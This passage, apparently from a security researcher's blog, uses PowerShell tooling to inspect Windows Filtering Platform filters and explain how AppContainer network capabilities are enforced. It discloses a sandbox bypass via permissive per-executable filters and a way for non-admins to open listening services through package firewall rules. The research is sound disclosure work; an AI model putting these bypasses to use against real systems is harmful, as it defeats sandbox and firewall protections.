Each layer exposes the list of fields which represent the conditions which can be checked in that layer, you can access the list through the FieldsΒ property. The output shown above contains a few of the condition types we saw earlier in the table of conditions. The output also shows the type of the condition and the data type you should provide when filtering on that condition.

PS> Get-FwSubLayer | Sort-Object Weight | Select KeyName, Weight

KeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Weight

------- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  ------

FWPM_SUBLAYER_INSPECTION Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  0

FWPM_SUBLAYER_TEREDO Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  1

MICROSOFT_DEFENDER_SUBLAYER_FIREWALL Β  Β  Β  Β  Β  2

MICROSOFT_DEFENDER_SUBLAYER_WSH Β  Β  Β  Β  Β  Β  Β  Β 3

MICROSOFT_DEFENDER_SUBLAYER_QUARANTINE Β  Β  Β  Β  4 Β  Β  Β  Β  Β  Β 

...

You can also inspect the sublayers in the same way, using the Get-FwSubLayerΒ command as shown above. The most useful information from the sublayer is the weight. As mentioned earlier this is used to determine the ordering of the associated filters. However, as we'll see you rarely need to query the weight yourself.

Filter Configuration

Enforcing the firewall rules is up to the filters. You can enumerate all filters using the Get-FwFilterΒ command.

PS> Get-FwFilter

FilterId ActionType Name

-------- ---------- ----

68071 Β  Β Block Β  Β  Boot Time Filter

71199 Β  Β Permit Β  Β @FirewallAPI.dll,-80201

71350 Β  Β Block Β  Β  Block inbound traffic to dmcertinst.exe

...

The default output shows the ID of a filter, the action type and the user defined name. The filter objects returned also contain the layer and sublayer identifiers as well as the list of matching conditions for the filter. As inspecting the filter is going to be the most common operation the module provides the Format-FwFilterΒ command to format a filter object in a more readable format.

PS> Get-FwFilter -Id 71350 | Format-FwFilter

Name Β  Β  Β  : Block inbound traffic to dmcertinst.exe

Action Type: Block

Key Β  Β  Β  Β : c391b53a-1b98-491c-9973-d86e23ea8a84

Id Β  Β  Β  Β  : 71350

Description:

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags Β  Β  Β : Indexed

Weight Β  Β  : 549755813888

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β --------- -----

FWPM_CONDITION_ALE_APP_ID Equal Β  Β 

\device\harddiskvolume3\windows\system32\dmcertinst.exe

The formatted output contains the layer and sublayer information, the assigned weight of the filter and the list of conditions. The layer is FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4Β which handles new incoming connections. The sublayer is MICROSOFT_DEFENDER_SUBLAYER_WSH which is used to group Windows Service HardeningΒ rules which apply regardless of the normal firewall configuration.

In this example the filter only matches on the socket creator process executable's path. The end result if the filter matches the current state is for the IPv4 TCP network connection to be blocked at the MICROSOFT_DEFENDER_SUBLAYER_WSHΒ sublayer. As already mentioned it now won't matter if a lower priority layer would permit the connection if the block is enforced.

How can we determine the ordering of sublayers and filters? You could manually extract the weights for each sublayer and filter and try and order them, and hopefully the ordering you come up with matches what WFP uses. A much simpler approach is to specify a flag when enumerating filters for a particular layer to request the BFE APIs sort the filters using the canonical ordering.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted

FilterId ActionType Β  Β  Name

-------- ---------- Β  Β  ----

65888 Β  Β Permit Β  Β  Β  Β  Interface Un-quarantine filter

66469 Β  Β Block Β  Β  Β  Β  Β AppContainerLoopback

66467 Β  Β Permit Β  Β  Β  Β  AppContainerLoopback

66473 Β  Β Block Β  Β  Β  Β  Β AppContainerLoopback

...

The SortedΒ parameter specifies the flag to sort the filters. You can now go through the list of filters in order and try and work out what would be the matched filter based on some criteria you decide on. Again it'd be helpful if we could get the BFE service to do more of the hard work in figuring out what rules would apply given a particular process. For this we can specify some of the metadata that represents the connection being made and get the BFE service to only return filters which match on their conditions.

PS> $template = New-FwFilterTemplate -AleLayer ConnectV4 -Sorted

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

65

PS> Add-FwCondition $template -ProcessId $pid

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> Add-FwCondition $template -IPAddress $addr.Address -Port 80

PS> Add-FwCondition $template -ProtocolType Tcp

PS> Add-FwCondition $template -ConditionFlags 0

PS> $template.Conditions

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  MatchType Value Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β 

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  --------- ----- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β 

FWPM_CONDITION_ALE_APP_ID Β  Β  Β  Β Equal Β  Β  \device\harddisk...

FWPM_CONDITION_ALE_USER_ID Β  Β  Β  Equal Β  Β  FirewallTokenInformation Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β 

FWPM_CONDITION_ALE_PACKAGE_ID Β  Β Equal Β  Β  S-1-0-0

FWPM_CONDITION_IP_REMOTE_ADDRESS Equal Β  Β  142.250.72.196

FWPM_CONDITION_IP_REMOTE_PORT Β  Β Equal Β  Β  80

FWPM_CONDITION_IP_PROTOCOL Β  Β  Β  Equal Β  Β  Tcp

FWPM_CONDITION_FLAGS Β  Β  Β  Β  Β  Β  Equal Β  Β  None

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

2

To specify the metadata we need to create an enumeration template using the New-FwFilterTemplateΒ command. We specify the Connect IPv4 layer as well as requesting that the results are sorted. Using this template with the Get-FwFilterΒ command returns 65 results (on my machine).

Next we add some metadata, first from the current powershell process. This populates the App ID with the executable path as well as token information such as the user ID and package ID of an AppContainer. We then add details about the target connection request, specifying a TCP connection to www.google.comΒ on port 80. Finally we add some condition flags, we'll come back to these flags later.

Using this new template results in only 2 filters whose conditions will match the metadata. Of course depending on your current configuration the number might be different. In this case 2 filters is much easier to understand than 65. If we format those two filter we see the following:

PS> $fs | Format-FwFilter

Name Β  Β  Β  : Default Outbound

Action Type: Permit

Key Β  Β  Β  Β : 07ba2a96-0364-4759-966d-155007bde926

Id Β  Β  Β  Β  : 67989

Description: Default Outbound

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags Β  Β  Β : None

Weight Β  Β  : 9223372036854783936

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal Β  Β  Public Β  Β 

FWPM_CONDITION_CURRENT_PROFILE_ID Β Equal Β  Β  Public

Name Β  Β  Β  : Default Outbound

Action Type: Permit

Key Β  Β  Β  Β : 36da9a47-b57d-434e-9345-0e36809e3f6a

Id Β  Β  Β  Β  : 67993

Description: Default Outbound

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags Β  Β  Β : None

Weight Β  Β  : 3458764513820540928

Both of the two filters permit the connection and based on the name they're the default backstop when no other filters match. It's possible to configure each network profile with different default backstops. In this case the default is to permit outbound traffic. We have two of them because both match all the metadata we provided, although if we'd specified a profile other than Public then we'd only get a single filter.

Can we prove that this is the filter which matches a TCP connection? Fortunately we can: WFP supports gathering network events related to the firewall. An event includes the filter which permitted or denied the network request, and we can then compare it to our two filters to see if one of them matched. You can use the Get-FwNetEventΒ command to read the current circular buffer of events.

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $s = [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $ev_temp = New-FwNetEventTemplate -Condition $template.Conditions

PS> Add-FwCondition $ev_temp -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $ev_temp | Format-List

FilterId Β  Β  Β  Β : 67989

LayerId Β  Β  Β  Β  : 48

ReauthReason Β  Β : 0

OriginalProfile : Public

CurrentProfile Β : Public

MsFwpDirection Β : 0

IsLoopback Β  Β  Β : False

Type Β  Β  Β  Β  Β  Β : ClassifyAllow

Flags Β  Β  Β  Β  Β  : IpProtocolSet, LocalAddrSet, RemoteAddrSet, ...

Timestamp Β  Β  Β  : 8/5/2021 11:24:41 AM

IPProtocol Β  Β  Β : Tcp

LocalEndpoint Β  : 10.0.0.101:63046

RemoteEndpoint Β : 142.250.72.196:80

ScopeId Β  Β  Β  Β  : 0

AppId Β  Β  Β  Β  Β  : \device\harddiskvolume3\windows\system32\wind...

UserId Β  Β  Β  Β  Β : S-1-5-21-4266194842-3460360287-487498758-1103

AddressFamily Β  : Inet

PackageSid Β  Β  Β : S-1-0-0

First we enable the ClassifyAllow event, which is generated when a firewall event is permitted. By default only firewall blocks are recorded using the ClassifyDrop event to avoid filling the small network event log with too much data. Next we make a connection to the Google web server we queried earlier to generate an event. We then disable the ClassifyAllow events again to reduce the risk we'll lose the event.

Next we can query for the current stored events using Get-FwNetEvent. To limit the network events returned to us we can specify a template in a similar way to when we queried for filters. In this case we create a new template using the New-FwNetEventTemplateΒ command and copy the existing conditions from our filter template. We then add a condition to match on only ClassifyAllow events.

Formatting the results we can see the network connection event to TCP port 80. Crucially if you compare the FilterId value to the Id fields in the two enumerated filters we match the first filter. This gives us confidence that we have a basic understanding of how the filtering works. Let's move on to running some tests to determine how the AppContainer network restrictions are implemented through WFP.

Worth noting at this point that because the network event buffer can be small, of the order of 30-40 events depending on load, it's possible on a busy server that events might be lost before you query for them. You can get a real-time trace of events by using the Start-FwNetEventListenerΒ command to avoid losing events.

Callout Drivers

As mentioned a developer can implement their own custom functionality to inspect and modify network traffic. This functionality is used by various different products, ranging from AV to scan your network traffic for badness to NMAP's NPCAP capturing loopback traffic.

To set up a callout the developer needs to do two things. First they need to register its callback functions for the callout using the FwpmCalloutRegisterΒ API in the kernel driver. Second they need to create a filter to use the callout by specifying the providerContextKeyΒ GUID and one of the action types which invoke a callout.

You can query the list of registered callouts using the FwpmCalloutEnum0Β API in user-mode. I expose this API through the Get-FwCalloutΒ command.

PS> Get-FwCallout | Sort CalloutId | Select CalloutId, KeyName

CalloutId KeyName

--------- -------

Β  Β  Β  Β  1 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V4

Β  Β  Β  Β  2 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V6

Β  Β  Β  Β  3 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V4

Β  Β  Β  Β  4 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V6

Β  Β  Β  Β  5 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V4

Β  Β  Β  Β  6 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V6

...

The above output shows the callouts listed by their callout ID numbers. The ID number is keyΒ to finding the callback functions in the kernel. There doesn't seem to be a way of enumerating the addresses of callout functions directly (at least from user mode). This articleΒ shows a basic approach to extract the callback functions using a kernel debugger, although it's a little out of date.

The NETIO driver stores all registered callbacks in a large array, the index being the callout ID. If you want to find a specific callout then find the base of the array using the description in the article then just calculate the offset based on a single callout structure and the index. For example on Windows 10 21H1 x64 the following command will dump a callout's classify callback function. Replace N with the callout ID, the magic numbers 198 and 50 are the offset into the gWfpGlobal global data table and the size of a callout entry which you can discover through analyzing the code.

0: kd> ln poi(poi(poi(NETIO!gWfpGlobal)+198)+(50*N)+10)

If you're in kernel mode there's an undocumented KfdGetRefCalloutΒ function (and a corresponding KfdDeRefCalloutΒ to decrement the reference) exported by NETIO which will return a pointer to the internal callout structure based on the ID avoiding the need to extract the offsets from disassembly.

AppContainer Network Restrictions

The basics of accessing the network from an AppContainer sandbox is documented by Microsoft. Specifically the lowbox token used for the sandbox needs to have one or more capabilitiesΒ enabled to grant access to the network. The three capabilities are:

  • internetClient - Grants client access to the Internet
  • internetClientServer - Grants client and server access to the Internet
  • privateNetworkClientServer - Grants client and server access to local private networks.

Client Capabilities

Pretty much all Windows Store applications are granted the internetClient capability as accessing the Internet is a thing these days. Even the built-in calculator has this capability, presumably so you can fill in feedback on how awesome a calculator it is.

Image showing the list of capabilities granted to Windows calculator application showing the β€œYour Internet Connection” capability is granted.

However, this shouldn't grant the ability to act as a network server, for that you need the internetClientServerΒ capability. Note that Windows defaults to blocking incoming connections, so just because you have the server capability still doesn't ensure you can receive network connections. The final capability is privateNetworkClientServerΒ which grants access to private networks as both a client and a server. What is the internet and what is private isn't made immediately clear, hopefully we'll find out from inspecting the firewall configuration.

PS> $token = Get-NtToken -LowBox -PackageSid TEST

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> $sock = Invoke-NtToken $token {

>> Β  [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

Exception calling ".ctor" with "2" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions 216.58.194.164:80"

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyDrop

PS> Get-FwNetEvent -Template $template | Format-List

FilterId Β  Β  Β  Β  Β  Β  Β  : 71079

LayerId Β  Β  Β  Β  Β  Β  Β  Β : 48

ReauthReason Β  Β  Β  Β  Β  : 0

...

PS> Get-FwFilter -Id 71079 | Format-FwFilter

Name Β  Β  Β  : Block Outbound Default Rule

Action Type: Block

Key Β  Β  Β  Β : fb8f5cab-1a15-4616-b63f-4a0d89e527f8

Id Β  Β  Β  Β  : 71079

Description: Block Outbound Default Rule

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags Β  Β  Β : None

Weight Β  Β  : 274877906944

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID NotEqual Β NULL SID

In the above output we first create a lowbox token for testing the AppContainer access. In this example we don't provide any capabilities for the token so we're expecting the network connection should fail. Next we connect a TcpClientΒ socket while impersonating the lowbox token, and the connection is immediately blocked with an error.

We then get the network event corresponding to the connection request to see what filter blocked the connection. Formatting the filter from the network event we find the β€œBlock Outbound Default Rule”. This will block any AppContainer network connection, based on the FWPM_CONDITION_ALE_PACKAGE_IDΒ condition which hasn't been permitted by higher priority firewall filters.

Like with the β€œDefault Outbound” filter we saw earlier, this is a backstop if nothing else matches. Unlike that earlier filter the default is to block rather than permit the connection. Another thing to note is the sublayer name. For β€œBlock Outbound Default Rule” it's MICROSOFT_DEFENDER_SUBLAYER_WSHΒ which is used for built-in filters which aren't directly visible from the Defender firewall configuration. Whereas MICROSOFT_DEFENDER_SUBLAYER_FIREWALLΒ is used for β€œDefault Outbound”, which is a lower priority sublayer (based on its weight) and thus would never be evaluated due to the higher priority block.

Okay, we know how connections are blocked. Therefore there must be a higher priority filter which permits the connection within the MICROSOFT_DEFENDER_SUBLAYER_WSHΒ sublayer. We could go back to manual inspection, but we might as well just see what the network event shows as the matching filter when we grant the internetClientΒ capability.

PS> $cap = Get-NtSid -KnownSid CapabilityInternetClient

PS> $token = Get-NtToken -LowBox -PackageSid TEST -CapabilitySid $cap

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $sock = Invoke-NtToken $token {

>> Β  [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $template | Format-List

FilterId Β  Β  Β  Β : 71075

LayerId Β  Β  Β  Β  : 48

ReauthReason Β  Β : 0

...

PS> Get-FwFilter -Id 71075 | Format-FwFilter

Name Β  Β  Β  : InternetClient Default Rule

Action Type: Permit

Key Β  Β  Β  Β : 406568a7-a949-410d-adbb-2642ec3e8653

Id Β  Β  Β  Β  : 71075

Description: InternetClient Default Rule

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags Β  Β  Β : None

Weight Β  Β  : 412316868544

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Β  Β  Β NotEqual Β NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS Β  Range Β  Β 

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal Β  Β  Public

FWPM_CONDITION_CURRENT_PROFILE_ID Β Equal Β  Β  Public

FWPM_CONDITION_ALE_USER_ID Β  Β  Β  Β  Equal Β  Β 

O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)

In this example we create a new token using the same package SID but with internetClient capability. When we connect the socket we now no longer get an error and the connection is permitted. Checking for the ClassifyAllow event we find the β€œInternetClient Default Rule” filter matched the connection.

Looking at the conditions we can see that it will only match if the socket creator is in an AppContainer based on the FWPM_CONDITION_ALE_PACKAGE_IDΒ condition. The FWPM_CONDITION_ALE_USER_IDΒ also ensures that it will only match if the creator has the internetCapability capability which is S-1-15-3-1 in the SDDL format. This filter is what's granting access to the network.

One odd thing is in the FWPM_CONDITION_IP_REMOTE_ADDRESSΒ condition. It seems to match on all possible IPv4 addresses. Shouldn't this exclude network addresses on our local β€œprivate” network? At the very least you'd assume this would block the reserved IP address ranges from RFC1918? The key to understanding this is the profile ID conditions, which are both set to Public. The computer I'm running these commands on has a single network interface configured to the public profile as shown:

Image showing the option of either Public or Private network profiles.

Therefore the firewall is configured to treat all network addresses in the same context, granting the internetClient capability access to any address including your local β€œprivate” network. This might be unexpected. In fact if you enumerate all the filters on the machine you won't find any filter to match the privateNetworkClientServer capability and using the capability will not grant access to any network resource.

If you switch the network profile to Private, you'll find there's now three β€œInternetClient Default Rule” filters (note on Windows 11 there will only be one as it uses the OR'ing feature of conditions as mentioned above to merge the three rules together).

Name Β  Β  Β  : InternetClient Default Rule

Action Type: Permit

...

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Β  Β  Β NotEqual Β NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS Β  Range Β  Β 

Low: 0.0.0.0 High: 10.0.0.0

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal Β  Β  Private

FWPM_CONDITION_CURRENT_PROFILE_ID Β Equal Β  Β  Private

...

Name Β  Β  Β  : InternetClient Default Rule

Action Type: Permit

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Β  Β  Β NotEqual Β NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS Β  Range Β  Β 

Low: 239.255.255.255 High: 255.255.255.255

...

Name Β  Β  Β  : InternetClient Default Rule

Action Type: Permit

...

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Β  Β  Β NotEqual Β NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS Β  Range Β  Β 

Low: 10.255.255.255 High: 224.0.0.0

...

As you can see in the first filter, it covers addresses 0.0.0.0 to 10.0.0.0. The machine's private network is 10.0.0.0/8. The profile IDs are also now set to Private. The other two exclude the entire 10.0.0.0/8 network as well as the multicast group addresses from 224.0.0.0 to 240.0.0.0.

The profile ID conditions are important here if you have more than one network interface. For example if you have two, one Public and one Private,Β you would get a filter for the Public network covering the entire IP address range and the three Private ones excluding the private network addresses. The Public filter won't match if the network traffic is being sent from the Private network interface preventing the application without the right capability from accessing the private network.

Speaking of which, we can also now identify the filter which will match the private network capability. There's two, to cover the private network range and the multicast range. We'll just show one of them.

Name Β  Β  Β  : PrivateNetwork Outbound Default Rule

Action Type: Permit

Key Β  Β  Β  Β : e0194c63-c9e4-42a5-bbd4-06d90532d5e6

Id Β  Β  Β  Β  : 71640

Description: PrivateNetwork Outbound Default Rule

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags Β  Β  Β : None

Weight Β  Β  : 36029209335832512

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Β  Β  Β NotEqual Β NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS Β  Range Β  Β 

Low: 10.0.0.0 High: 10.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal Β  Β  Private

FWPM_CONDITION_CURRENT_PROFILE_ID Β Equal Β  Β  Private

FWPM_CONDITION_ALE_USER_ID Β  Β  Β  Β  Equal Β  Β 

O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)

We can see in the FWPM_CONDITION_ALE_USER_IDΒ condition that the connection would be permitted if the creator has the privateNetworkClientServer capability, which is S-1-15-3-3 in SDDL.

It is slightly ironic that the Public network profile is probably recommended even if you're on your own private network (Windows 11 even makes the recommendation explicit as shown below) in that it should reduce the exposed attack surface of the device from others on the network. However if an AppContainer application with the internetClient capability could be compromised it opens up your private network to access where the Private profile wouldn't.

Image showing the option of either Public or Private network profiles. This is from Windows 11 where Public is marked as recommended.

Aside: one thing you might wonder, if your network interface is marked as Private and the AppContainer application only has the internetClient capability, what happens if your DNS server is your local router at 10.0.0.1? Wouldn't the application be blocked from making DNS requests? Windows has a DNS client service which typically is always running. This service is what usually makes DNS requests on behalf of applications as it allows the results to be cached. The RPC server which the service exposes allows callers which have any of the three network capabilities to connect to it and make DNS requests, avoiding the problem. Of course if the service is disabled in-process DNS lookups will start to be used, which could result in weird name resolving issues depending on your network configuration.

We can now understand how issue 2207Β I reported to Microsoft bypasses the capability requirements. If in the MICROSOFT_DEFENDER_SUBLAYER_WSHΒ sublayer for an outbound connection there are PermitΒ filters which are evaluated before the β€œBlock Outbound Default Rule” filter then it might be possible to avoid needing capabilities.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted |

Where-Object SubLayerKeyName -eq MICROSOFT_DEFENDER_SUBLAYER_WSH |

Select-Object ActionType, Name

...

Permit Β  Β  Allow outbound TCP traffic from dmcertinst.exe

Permit Β  Β  Allow outbound TCP traffic from omadmclient.exe

Permit Β  Β  Allow outbound TCP traffic from deviceenroller.exe

Permit Β  Β  InternetClient Default Rule

Permit Β  Β  InternetClientServer Outbound Default Rule

Block Β  Β  Β Block all outbound traffic from SearchFilterHost

Block Β  Β  Β Block outbound traffic from dmcertinst.exe

Block Β  Β  Β Block outbound traffic from omadmclient.exe

Block Β  Β  Β Block outbound traffic from deviceenroller.exe

Block Β  Β  Β Block Outbound Default Rule

Block Β  Β  Β WSH Default Outbound Block

PS> Get-FwFilter -Id 72753 | Format-FwFilter

Name Β  Β  Β  : Allow outbound TCP traffic from dmcertinst.exe

Action Type: Permit

Key Β  Β  Β  Β : 5237f74f-6346-4038-a48d-4b779f862e65

Id Β  Β  Β  Β  : 72753

Description:

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags Β  Β  Β : Indexed

Weight Β  Β  : 422487342972928

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ALE_APP_ID Β Equal Β  Β 

\device\harddiskvolume3\windows\system32\dmcertinst.exe

FWPM_CONDITION_IP_PROTOCOL Equal Β  Β  Tcp

As we can see in the output there are quite a few Permit filters before the β€œBlock Outbound Default Rule” filter, and of course I've also cropped the list to make it smaller. If we inspect the β€œAllow outbound TCP traffic from dmcertinst.exe” filter we find that it only matches on the App ID and the IP protocol. As it doesn't have an AppContainer specific checks, then any sockets created in the context of a dmcertinstΒ process would be permitted to make TCP connections.

Once the β€œAllow outbound TCP traffic from dmcertinst.exe” filter matches the sublayer evaluation is terminated and it never reaches the β€œBlock Outbound Default Rule” filter. This is fairly trivial to exploit, as long as the AppContainer process is allowed to spawn new processes, which is allowed by default.

Server Capabilities

What about the internetClientServerΒ capability, how does that function? First, there's a second set of outbound filters to cover the capability with the same network addresses as the base internetClient capability. The only difference is the FWPM_CONDITION_ALE_USER_IDΒ condition checks for the internetClientServer (S-1-15-3-2)Β capability instead. For inbound connections the FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4Β layer contains the filter.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match InternetClientServer |

Format-FwFilter

Name Β  Β  Β  : InternetClientServer Inbound Default Rule

Action Type: Permit

Key Β  Β  Β  Β : 45c5f1d5-6ad2-4a2a-a605-4cab7d4fb257

Id Β  Β  Β  Β  : 72470

Description: InternetClientServer Inbound Default Rule

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags Β  Β  Β : None

Weight Β  Β  : 824633728960

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Β  Β  Β NotEqual Β NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS Β  Range Β  Β 

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal Β  Β  Public

FWPM_CONDITION_CURRENT_PROFILE_ID Β Equal Β  Β  Public

FWPM_CONDITION_ALE_USER_ID Β  Β  Β  Β  Equal Β  Β 

O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)

The example shows the filter for a Public network interface granting an AppContainer application the ability to receive network connections. However, this will only be permitted if the socket creator has internetClientServer capability. Note, there would be similar rules for the private network if the network interface is marked as PrivateΒ but only granting access with the privateNetworkClientServer capability.

As mentioned earlier just because an application has one of these capabilities doesn't mean it can receive network connections. The default configuration will block the inbound connection. Β However, when an UWPΒ application is installed and requires one of the two server capabilities, the AppX installer service registers the AppContainer profile with the Windows Defender Firewall service. This adds a filter to permit the AppContainer package to receive inbound connections. For example the following is for the Microsoft Photos application, which is typically installed by default:

PS> Get-FwFilter -Id 68299 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name Β  Β  Β  : @{Microsoft.Windows.Photos_2021...

Action Type: Permit

Key Β  Β  Β  Β : 7b51c091-ed5f-42c7-a2b2-ce70d777cdea

Id Β  Β  Β  Β  : 68299

Description: @{Microsoft.Windows.Photos_2021...

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags Β  Β  Β : Indexed

Weight Β  Β  : 10376294366095343616

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  Β  Β MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  Β  Β --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Equal Β  Β 

microsoft.windows.photos_8wekyb3d8bbwe

FWPM_CONDITION_ALE_USER_ID Β  Β Equal Β  Β  O:SYG:SYD:(A;;CCRC;;;S-1-5-21-3563698930-1433966124...

<Owner> (Defaulted) : NT AUTHORITY\SYSTEM

<Group> (Defaulted) : NT AUTHORITY\SYSTEM

<DACL>

DOMAIN\alice: (Allowed)(None)(Full Access)

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection,...

APPLICATION PACKAGE AUTHORITY\Your home or work networks:...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Full Access)

The filter only checks that the package SID matches and that the socket creator is a specific user in an AppContainer. Note this rule doesn't do any checking on the executable file, remote IP address, port or profile ID. Once an installed AppContainer application is granted a server capability it can act as a server through the firewall for any traffic type or port.

A normal application could abuse this configuration to run a network service without needing the administrator access normally required to grant the executable access. All you'd need to do is create an arbitrary AppContainer process in the permitted package and grant it the internetClientServer and/or the privateNetworkClientServer capabilities. If there isn't an application installed which has the appropriate firewall rules a non-administrator user can install any signed application with the appropriate capabilities to add the firewall rules. While this clearly circumvents the expected administrator requirements for new listening processes it's presumably by design.

Localhost Access

